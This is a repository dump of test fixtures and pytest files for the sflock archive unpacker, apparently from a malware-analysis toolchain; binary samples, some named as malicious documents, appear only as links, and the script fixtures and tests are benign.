https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/xlsx/.gitkeep


--------------------------------------------------------------------------------
/tests/files/extension/xlsx/5d7bde4d4d96427d47f2267017020a567ee650184ca8913766eab75bf3630bc3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/xlsx/5d7bde4d4d96427d47f2267017020a567ee650184ca8913766eab75bf3630bc3


--------------------------------------------------------------------------------
/tests/files/extension/xlsx/ff9d094be8cfc1a131e8d8fb714f27287057c6de64d19a5ac752715f52b24d64:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/xlsx/ff9d094be8cfc1a131e8d8fb714f27287057c6de64d19a5ac752715f52b24d64


--------------------------------------------------------------------------------
/tests/files/garbage.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/garbage.bin


--------------------------------------------------------------------------------
/tests/files/gzip1.gzip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/gzip1.gzip


--------------------------------------------------------------------------------
/tests/files/gzip_noext:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/gzip_noext


--------------------------------------------------------------------------------
/tests/files/invld.elf_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/invld.elf_


--------------------------------------------------------------------------------
/tests/files/iso_udf_noext:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/iso_udf_noext


--------------------------------------------------------------------------------
/tests/files/iso_udf_nomagic_noext:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/iso_udf_nomagic_noext


--------------------------------------------------------------------------------
/tests/files/lnk_1.lnk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/lnk_1.lnk


--------------------------------------------------------------------------------
/tests/files/maldoc.xls:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/maldoc.xls


--------------------------------------------------------------------------------
/tests/files/maldoc/0882c8:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/maldoc/0882c8


--------------------------------------------------------------------------------
/tests/files/maldoc/118368:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/maldoc/118368


--------------------------------------------------------------------------------
/tests/files/maldoc_office.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/maldoc_office.htm


--------------------------------------------------------------------------------
/tests/files/msg_doc.msg_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/msg_doc.msg_


--------------------------------------------------------------------------------
/tests/files/msg_invoice.msg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/msg_invoice.msg


--------------------------------------------------------------------------------
/tests/files/msg_rtf.msg_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/msg_rtf.msg_


--------------------------------------------------------------------------------
/tests/files/ole_nullbyte.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/ole_nullbyte.zip


--------------------------------------------------------------------------------
/tests/files/oledata.mso:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/oledata.mso


--------------------------------------------------------------------------------
/tests/files/oledoc1.doc_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/oledoc1.doc_


--------------------------------------------------------------------------------
/tests/files/partial.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/partial.zip


--------------------------------------------------------------------------------
/tests/files/payment.iso:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/payment.iso


--------------------------------------------------------------------------------
/tests/files/pdf_docm.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/pdf_docm.pdf


--------------------------------------------------------------------------------
/tests/files/pptx_1.pptx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/pptx_1.pptx


--------------------------------------------------------------------------------
/tests/files/quota.daa:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/quota.daa


--------------------------------------------------------------------------------
/tests/files/randomfile.lha:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/randomfile.lha


--------------------------------------------------------------------------------
/tests/files/rar_garbage.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/rar_garbage.rar


--------------------------------------------------------------------------------
/tests/files/rar_nested.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/rar_nested.rar


--------------------------------------------------------------------------------
/tests/files/rar_nested2.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/rar_nested2.rar


--------------------------------------------------------------------------------
/tests/files/rar_plain.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/rar_plain.rar


--------------------------------------------------------------------------------
/tests/files/readelf.cab:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/readelf.cab


--------------------------------------------------------------------------------
/tests/files/sample.apk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/sample.apk


--------------------------------------------------------------------------------
/tests/files/sample.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/sample.jar


--------------------------------------------------------------------------------
/tests/files/script.js:
--------------------------------------------------------------------------------
 1 | function greet(name) {
 2 |     return "Hello " + name;
 3 | }
 4 | 
 5 | var who = "World";
 6 | console.log(greet(who));
 7 | 
 8 | var show = false;
 9 | if (show) {
10 |     alert(greet(who));
11 |     eval(1 + true);
12 | }
13 | 


--------------------------------------------------------------------------------
/tests/files/script.ps1:
--------------------------------------------------------------------------------
1 | Get-WmiObject -Class Win32_OperatingSystem –ComputerName localhost |
2 | Select-Object -Property CSName,LastBootUpTime
3 | 


--------------------------------------------------------------------------------
/tests/files/script.vbs:
--------------------------------------------------------------------------------
 1 | Attribute VB_TEST = FOO
 2 | 
 3 | strComputer = "."
 4 | Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
 5 | Set colProcesses = objWMIService.ExecQuery _
 6 |     ("Select * from Win32_Process Where Name = 'Dfrgntfs.exe'")
 7 | If colProcesses.Count = 0 Then
 8 |     Wscript.Echo " Dfrgntfs.exe is not running."
 9 | Else
10 |     Wscript.Echo " Dfrgntfs.exe is running."
11 | End If
12 | 
13 | For i = 1 to 5
14 |     Wscript.echo i
15 | Next
16 | 
17 | Public Sub hello()
18 |     If 1
19 |         Wscript.Echo "hello"
20 | End Sub
21 | 
22 | Function hello2()
23 |     Dim var1
24 | End Function
25 | 


--------------------------------------------------------------------------------
/tests/files/script.wsf:
--------------------------------------------------------------------------------
 1 | <job id="PERLandVBS">
 2 |    <script language="PerlScript">
 3 |       sub PerlHello {
 4 |          my $str = @_[0];
 5 |          $WScript->Echo($str);
 6 |       }
 7 |    </script>
 8 | 
 9 |    <script language="VBScript">
10 |       WScript.Echo "Hello from VBScript"
11 |       PerlHello "Hello from PERLScript"
12 |    </script>
13 | </job>
14 | 


--------------------------------------------------------------------------------
/tests/files/sflock.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/sflock.rar


--------------------------------------------------------------------------------
/tests/files/sflock2.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/sflock2.rar


--------------------------------------------------------------------------------
/tests/files/sflock_encrypted.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/sflock_encrypted.rar


--------------------------------------------------------------------------------
/tests/files/sflock_encrypted2.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/sflock_encrypted2.rar


--------------------------------------------------------------------------------
/tests/files/symlink.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/symlink.rar


--------------------------------------------------------------------------------
/tests/files/tar_garbage.tar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/tar_garbage.tar


--------------------------------------------------------------------------------
/tests/files/tar_nested.tar.bz2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/tar_nested.tar.bz2


--------------------------------------------------------------------------------
/tests/files/tar_nested.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/tar_nested.tar.gz


--------------------------------------------------------------------------------
/tests/files/tar_plain2.tar.bz2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/tar_plain2.tar.bz2


--------------------------------------------------------------------------------
/tests/files/tar_plain2.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/tar_plain2.tar.gz


--------------------------------------------------------------------------------
/tests/files/tarbz2_noext:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/tarbz2_noext


--------------------------------------------------------------------------------
/tests/files/targz_no_ext:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/targz_no_ext


--------------------------------------------------------------------------------
/tests/files/test.hta_:
--------------------------------------------------------------------------------
 1 | <head>
 2 | <title>HTA Test</title>
 3 | <HTA:APPLICATION 
 4 |      APPLICATIONNAME="HTA Test"
 5 |      SCROLL="yes"
 6 |      SINGLEINSTANCE="yes"
 7 |      WINDOWSTATE="maximize"
 8 | >
 9 | </head>
10 | 
11 | <script language="VBScript">
12 |     Sub TestSub
13 |         Msgbox "Testing 1-2-3."
14 |     End Sub
15 | </script>
16 | 
17 | <body>
18 | <input type="button" value="Run Script" name="run_button"  onClick="TestSub"><p> 
19 | 
20 | </body>
21 | 


--------------------------------------------------------------------------------
/tests/files/test.lzh:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/test.lzh


--------------------------------------------------------------------------------
/tests/files/xlsx_encoded.xlsx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/xlsx_encoded.xlsx


--------------------------------------------------------------------------------
/tests/files/zip_encrypted.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/zip_encrypted.zip


--------------------------------------------------------------------------------
/tests/files/zip_encrypted2.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/zip_encrypted2.zip


--------------------------------------------------------------------------------
/tests/files/zip_garbage.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/zip_garbage.zip


--------------------------------------------------------------------------------
/tests/files/zip_nested.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/zip_nested.zip


--------------------------------------------------------------------------------
/tests/files/zip_nested2.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/zip_nested2.zip


--------------------------------------------------------------------------------
/tests/files/zip_plain.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/zip_plain.zip


--------------------------------------------------------------------------------
/tests/test_7z.py:
--------------------------------------------------------------------------------
  1 | # Copyright (C) 2015-2018 Jurriaan Bremer.
  2 | # This file is part of SFlock - http://www.sflock.org/.
  3 | # See the file 'docs/LICENSE.txt' for copying permission.
  4 | 
  5 | import hashlib
  6 | import os.path
  7 | import pytest
  8 | 
  9 | from sflock.abstracts import File
 10 | from sflock.exception import UnpackException
 11 | from sflock.errors import Errors
 12 | from sflock.main import unpack
 13 | from sflock.unpack import Zip7File
 14 | 
 15 | def f(filename):
 16 |     return File.from_path(os.path.join("tests", "files", filename))
 17 | 
 18 | @pytest.mark.skipif("not Zip7File(None).supported()")
 19 | class Test7zFile(object):
 20 |     def test_7z_plain(self):
 21 |         assert "7-zip archive" in f("7z_plain.7z").magic
 22 |         t = Zip7File(f("7z_plain.7z"))
 23 |         assert t.handles() is True
 24 |         assert not t.f.selected
 25 |         files = list(t.unpack())
 26 |         assert len(files) == 1
 27 |         assert not files[0].filepath
 28 |         assert files[0].relapath == "bar.txt"
 29 |         assert files[0].contents == b"hello world\n"
 30 |         assert files[0].magic == "ASCII text"
 31 |         assert files[0].parentdirs == []
 32 |         assert not files[0].selected
 33 | 
 34 |     def test_nested_plain(self):
 35 |         assert "7-zip archive" in f("7z_nested.7z").magic
 36 |         t = Zip7File(f("7z_nested.7z"))
 37 |         assert t.handles() is True
 38 |         assert not t.f.selected
 39 |         files = list(t.unpack())
 40 |         assert len(files) == 1
 41 | 
 42 |         assert files[0].relapath == "foo/bar.txt"
 43 |         assert files[0].parentdirs == ["foo"]
 44 |         assert files[0].contents == b"hello world\n"
 45 |         assert not files[0].password
 46 |         assert files[0].magic == "ASCII text"
 47 |         assert not files[0].selected
 48 | 
 49 |     def test_nested2_plain(self):
 50 |         assert "7-zip archive" in f("7z_nested2.7z").magic
 51 |         t = Zip7File(f("7z_nested2.7z"))
 52 |         assert t.handles() is True
 53 |         assert not t.f.selected
 54 |         files = list(t.unpack())
 55 |         assert len(files) == 1
 56 | 
 57 |         assert files[0].relapath == "deepfoo/foo/bar.txt"
 58 |         assert files[0].parentdirs == ["deepfoo", "foo"]
 59 |         assert files[0].contents == b"hello world\n"
 60 |         assert not files[0].password
 61 |         assert files[0].magic == "ASCII text"
 62 |         assert not files[0].selected
 63 | 
 64 |     def test_inmemory(self):
 65 |         contents = open("tests/files/7z_plain.7z", "rb").read()
 66 |         t = unpack(contents=contents)
 67 |         assert t.unpacker == "7zfile"
 68 |         assert t.filename is None
 69 |         assert t.filepath is None
 70 |         assert len(t.children) == 1
 71 | 
 72 |     def test_gzip_file(self):
 73 |         t = unpack(contents=open("tests/files/gzip1.gzip", "rb").read())
 74 |         assert t.unpacker == "gzipfile"
 75 |         assert len(t.children) == 1
 76 |         assert len(t.children[0].contents) == 801792
 77 | 
 78 |     def test_gzip_noext(self):
 79 |         t = unpack("tests/files/gzip_noext")
 80 |         assert t.unpacker == "gzipfile"
 81 |         assert len(t.children) == 1
 82 |         assert len(t.children[0].contents) == 7381
 83 | 
 84 |     """
 85 |     def test_zip_encrypted(self):
 86 |         assert "7-zip archive" in f("7z_encrypted.7z").magic
 87 |         z = Zip7File(f("7z_encrypted.7z"))
 88 |         assert z.handles() is True
 89 |         assert not t.f.selected
 90 |         files = list(z.unpack("infected"))
 91 |         assert len(files) == 1
 92 |         assert files[0].relapath == "bar.txt"
 93 |         assert files[0].contents == "hello world\n"
 94 |         assert files[0].password == "infected"
 95 |         assert files[0].magic == "ASCII text"
 96 |         assert files[0].parentdirs == []
 97 |         assert not files[0].selected
 98 |     """
 99 | 
100 |     def test_garbage(self):
101 |         t = Zip7File(f("garbage.bin"))
102 |         assert t.handles() is False
103 |         assert not t.f.selected
104 |         with pytest.raises(UnpackException) as e:
105 |             t.unpack()
106 | 
107 |         assert e.value.state == Errors.NOTHING_EXTRACTED
108 | 
109 |     def test_garbage2(self):
110 |         t = Zip7File(f("7z_garbage.7z"))
111 |         assert t.handles() is True
112 |         assert not t.f.selected
113 |         files = t.unpack()
114 |         assert len(files) == 1
115 | 
116 |         # The child file is garbage data. It should not be attempted
117 |         # to unpack.
118 |         assert not files[0].children
119 |         assert files[0].mode is None
120 | 
121 |     def test_heuristics(self):
122 |         t = unpack("tests/files/7z_plain.7z", filename="foo")
123 |         assert t.unpacker == "7zfile"
124 |         assert t.filename == "foo"
125 | 
126 |         t = unpack("tests/files/7z_nested.7z", filename="foo")
127 |         assert t.unpacker == "7zfile"
128 |         assert t.filename == "foo"
129 | 
130 |         t = unpack("tests/files/7z_nested2.7z", filename="foo")
131 |         assert t.unpacker == "7zfile"
132 |         assert t.filename == "foo"
133 | 
134 |         """
135 |         t = unpack(b"tests/files/7z_encrypted.7z", filename="foo")
136 |         assert t.unpacker == "7zfile"
137 |         assert t.filename == "foo"
138 |         """
139 | 
140 |     def test_payment_iso(self):
141 |         t = Zip7File(f("payment.iso"))
142 |         assert t.handles() is True
143 |         assert not t.f.selected
144 |         files = t.unpack()
145 |         assert len(files) == 1
146 |         assert hashlib.md5(files[0].contents).hexdigest() == (
147 |             "eccd7c33037181277ae23f3c3b5baf74"
148 |         )
149 |         assert not files[0].children
150 |         assert files[0].relaname == (
151 |             "payment slip and bank confirmation document.exe"
152 |         )
153 |         assert files[0].selected is True
154 |         assert files[0].duplicate is False
155 | 
156 |     def test_udf_iso_noext(self):
157 |         upacker = Zip7File(f("iso_udf_noext"))
158 |         assert upacker.handles()
159 |         assert upacker.supported()
160 |         t = unpack("tests/files/iso_udf_noext")
161 |         assert t.unpacker == "7zfile"
162 |         assert len(t.children) == 1
163 |         assert t.children[0].filename == "ATTACHME.EXE"
164 | 
165 |     def test_udf_nomagic_noext(self):
166 |         unpacker = Zip7File(f("iso_udf_nomagic_noext"))
167 |         assert unpacker.handles()
168 |         assert unpacker.supported()
169 |         unpacked = unpack("tests/files/iso_udf_nomagic_noext")
170 |         assert unpacked.unpacker == "7zfile"
171 |         assert len(unpacked.children) == 1
172 |         assert unpacked.children[0].filename == "Draft BL-msc7390378.exe"
173 | 
174 | @pytest.mark.skipif("Zip7File(None).supported()")
175 | def test_no7z_plain():
176 |     assert "7-zip archive" in f("7z_plain.7z").magic
177 |     t = Zip7File(f("7z_plain.7z"))
178 |     assert t.handles() is True
179 | 


--------------------------------------------------------------------------------
/tests/test_ace.py:
--------------------------------------------------------------------------------
  1 | # Copyright (C) 2016-2018 Jurriaan Bremer.
  2 | # This file is part of SFlock - http://www.sflock.org/.
  3 | # See the file 'docs/LICENSE.txt' for copying permission.
  4 | 
  5 | import os.path
  6 | import pytest
  7 | 
  8 | from sflock.abstracts import File
  9 | from sflock.errors import Errors
 10 | from sflock.exception import UnpackException
 11 | from sflock.main import unpack
 12 | from sflock.unpack import AceFile
 13 | 
 14 | def f(filename):
 15 |     return File.from_path(os.path.join("tests", "files", filename))
 16 | 
 17 | @pytest.mark.skipif("not AceFile(None).supported()")
 18 | class TestAceFile(object):
 19 |     def test_ace_plain(self):
 20 |         assert "ACE archive" in f("ace_plain.ace").magic
 21 |         t = AceFile(f("ace_plain.ace"))
 22 |         assert t.handles() is True
 23 |         assert not t.f.selected
 24 |         files = list(t.unpack())
 25 |         assert len(files) == 1
 26 |         assert not files[0].filepath
 27 |         assert files[0].relapath == "ace.txt"
 28 |         assert files[0].contents == b"wow .ace"
 29 |         assert "ASCII text" in files[0].magic
 30 |         assert files[0].parentdirs == []
 31 |         assert not files[0].selected
 32 | 
 33 |     def test_nested_plain(self):
 34 |         assert "ACE archive" in f("ace_nested.ace").magic
 35 |         t = AceFile(f("ace_nested.ace"))
 36 |         assert t.handles() is True
 37 |         assert not t.f.selected
 38 |         files = list(t.unpack())
 39 |         assert len(files) == 1
 40 | 
 41 |         assert files[0].relapath == "b00/ace.txt"
 42 |         assert files[0].parentdirs == ["b00"]
 43 |         assert files[0].contents == b"wow .ace"
 44 |         assert not files[0].password
 45 |         assert "ASCII text" in files[0].magic
 46 |         assert not files[0].selected
 47 | 
 48 |     def test_nested2_plain(self):
 49 |         assert "ACE archive" in f("ace_nested2.ace").magic
 50 |         t = AceFile(f("ace_nested2.ace"))
 51 |         assert t.handles() is True
 52 |         assert not t.f.selected
 53 |         files = list(t.unpack())
 54 |         assert len(files) == 1
 55 | 
 56 |         assert files[0].relapath == "derp/b00/ace.txt"
 57 |         assert files[0].parentdirs == ["derp", "b00"]
 58 |         assert files[0].contents == b"wow .ace"
 59 |         assert not files[0].password
 60 |         assert "ASCII text" in files[0].magic
 61 |         assert not files[0].selected
 62 | 
 63 |     def test_heuristics(self):
 64 |         t = unpack("tests/files/ace_plain.ace", filename="foo")
 65 |         assert t.unpacker == "acefile"
 66 |         assert t.filename == "foo"
 67 | 
 68 |         t = unpack("tests/files/ace_nested.ace", filename="foo")
 69 |         assert t.unpacker == "acefile"
 70 |         assert t.filename == "foo"
 71 | 
 72 |         t = unpack("tests/files/ace_nested2.ace", filename="foo")
 73 |         assert t.unpacker == "acefile"
 74 |         assert t.filename == "foo"
 75 | 
 76 |     def test_doubledot(self):
 77 |         files = list(AceFile(f("ace_doubledot.ace")).unpack())
 78 |         assert len(files) == 1
 79 |         assert files[0].filename == (
 80 |             "Procurement commercial terms & conditions..exe"
 81 |         )
 82 | 
 83 |     def test_inmemory(self):
 84 |         contents = open("tests/files/ace_plain.ace", "rb").read()
 85 |         t = unpack(contents=contents)
 86 |         assert t.unpacker == "acefile"
 87 |         assert t.filename is None
 88 |         assert t.filepath is None
 89 |         assert len(t.children) == 1
 90 | 
 91 |     def test_garbage(self):
 92 |         t = AceFile(f("garbage.bin"))
 93 |         assert t.handles() is False
 94 |         assert not t.f.selected
 95 |         with pytest.raises(UnpackException) as e:
 96 |             t.unpack()
 97 |         assert e.value.state == Errors.NOTHING_EXTRACTED
 98 | 
 99 | @pytest.mark.skipif("AceFile(None).supported()")
100 | def test_noace_plain():
101 |     assert "ACE archive" in f("ace_plain.ace").magic
102 |     t = AceFile(f("ace_plain.ace"))
103 |     assert t.handles() is True
104 |     assert not t.f.selected
105 | 


--------------------------------------------------------------------------------
/tests/test_attr.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2016-2018 Jurriaan Bremer.
 2 | # This file is part of SFlock - http://www.sflock.org/.
 3 | # See the file 'docs/LICENSE.txt' for copying permission.
 4 | 
 5 | import json
 6 | import os
 7 | 
 8 | from sflock.abstracts import File
 9 | from sflock.exception import UnpackException
10 | from sflock.main import unpack
11 | from sflock.unpack import plugins
12 | 
13 | def f(filename):
14 |     return File.from_path(os.path.join("tests", "files", filename))
15 | 
16 | def test_attributes():
17 |     for filename in os.listdir("tests/files"):
18 |         if os.path.isdir("tests/files/%s" % filename):
19 |             continue
20 | 
21 |         if "encrypted" in filename:
22 |             continue
23 | 
24 |         f = unpack("tests/files/%s" % filename)
25 |         assert json.loads(json.dumps(list(f.to_dict()))) == list(f.to_dict())
26 | #
27 | def test_unpack_not_none():
28 |     for filename in os.listdir("tests/files"):
29 |         if os.path.isdir("tests/files/%s" % filename):
30 |             continue
31 | 
32 |         for unpacker in plugins.values():
33 |             if not unpacker(None).supported():
34 |                 continue
35 | 
36 |             try:
37 |                 u = unpacker(f(filename)).unpack()
38 |                 assert isinstance(u, list)
39 |             except UnpackException:
40 |                 continue
41 | 


--------------------------------------------------------------------------------
/tests/test_bup.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2016-2018 Jurriaan Bremer.
 2 | # This file is part of SFlock - http://www.sflock.org/.
 3 | # See the file 'docs/LICENSE.txt' for copying permission.
 4 | 
 5 | import os.path
 6 | 
 7 | from sflock.abstracts import File
 8 | from sflock.errors import Errors
 9 | from sflock.unpack import BupFile
10 | 
11 | def f(filename):
12 |     return File.from_path(os.path.join("tests", "files", filename))
13 | 
14 | def test_bup_plain():
15 |     assert f("bup_test.bup").magic.startswith((
16 |         "Composite Document File V2", "CDF V2 Document"
17 |     ))
18 |     t = BupFile(f("bup_test.bup"))
19 |     assert t.handles() is True
20 |     assert not t.f.selected
21 |     files = list(t.unpack())
22 | 
23 |     assert len(files) == 1
24 |     assert not files[0].filepath
25 |     assert files[0].relapath == "efax_9057733019_pdf.zip"
26 |     assert "Zip archive" in files[0].magic
27 |     assert files[0].parentdirs == []
28 |     assert files[0].extension == "zip"
29 |     assert files[0].platforms == [
30 |                         {"platform": "windows", "os_version": ""},
31 |                         {"platform": "darwin", "os_version": ""},
32 |                         {"platform": "linux", "os_version": ""},
33 |                         {"platform": "android", "os_version": ""},
34 |                         {"platform": "ios", "os_version": ""}
35 |                     ]
36 |     assert not files[0].selected
37 | 
38 |     assert len(files[0].children) == 1
39 |     assert not files[0].children[0].filepath
40 |     assert files[0].children[0].relapath == "efax_9057733019_pdf.scr"
41 |     assert files[0].children[0].filesize == 377856
42 |     assert files[0].children[0].extension == "exe"
43 |     assert files[0].children[0].platforms == [{"platform": "windows", "os_version": ""}]
44 |     assert files[0].children[0].selected is True
45 | 
46 | def test_garbage():
47 |     t = BupFile(f("garbage.bin"))
48 |     assert t.handles() is False
49 |     assert not t.f.selected
50 |     assert not t.unpack()
51 |     assert t.f.mode == Errors.UNPACK_FAILED
52 | 


--------------------------------------------------------------------------------
/tests/test_cab.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2017-2018 Jurriaan Bremer.
 2 | # This file is part of SFlock - http://www.sflock.org/.
 3 | # See the file 'docs/LICENSE.txt' for copying permission.
 4 | 
 5 | import os.path
 6 | import pytest
 7 | 
 8 | from sflock.abstracts import File
 9 | from sflock.errors import Errors
10 | from sflock.exception import UnpackException
11 | from sflock.main import unpack
12 | from sflock.unpack import CabFile
13 | 
14 | def f(filename):
15 |     return File.from_path(os.path.join("tests", "files", filename))
16 | 
17 | @pytest.mark.skipif("not CabFile(None).supported()")
18 | class TestCabFile(object):
19 |     def test_cab2(self):
20 |         assert "Microsoft Cabinet archive" in f("cab2.cab").magic
21 |         t = CabFile(f("cab2.cab"))
22 |         assert t.handles() is True
23 |         assert not t.f.selected
24 |         files = list(t.unpack())
25 |         assert len(files) == 1
26 |         assert not files[0].filepath
27 |         assert files[0].relapath == "Seamark Quotation.exe"
28 |         assert files[0].filesize == 792376
29 |         assert "PE32" in files[0].magic
30 |         assert files[0].parentdirs == []
31 |         assert files[0].selected is True
32 | 
33 |     def test_heuristics(self):
34 |         t = unpack("tests/files/cab2.cab", filename="foo")
35 |         assert t.unpacker == "cabfile"
36 |         assert t.filename == "foo"
37 | 
38 |         t = unpack("tests/files/readelf.cab", filename="foo")
39 |         assert t.unpacker == "cabfile"
40 |         assert t.filename == "foo"
41 | 
42 |     def test_inmemory(self):
43 |         contents = open("tests/files/cab2.cab", "rb").read()
44 |         t = unpack(contents=contents)
45 |         assert t.unpacker == "cabfile"
46 |         assert t.filename is None
47 |         assert t.filepath is None
48 |         assert len(t.children) == 1
49 | 
50 |     def test_garbage(self):
